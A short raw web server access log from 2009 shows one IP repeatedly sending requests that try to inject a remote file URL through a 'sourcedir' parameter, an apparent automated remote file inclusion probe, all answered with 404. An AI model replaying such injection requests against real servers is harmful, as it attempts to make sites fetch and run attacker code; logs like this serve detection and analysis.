74.54.241.100 - - [05/May/2009:09:29:54 -0700] "GET /logs/index.php?sourcedir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:29:54 -0700] "GET /logs//logs/index.php?sourcedir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:29:54 -0700] "GET /logs/access_080831.log//logs/index.php?sourcedir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:29:54 -0700] "GET /logs/access_080412.log//logs/index.php?sourcedir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
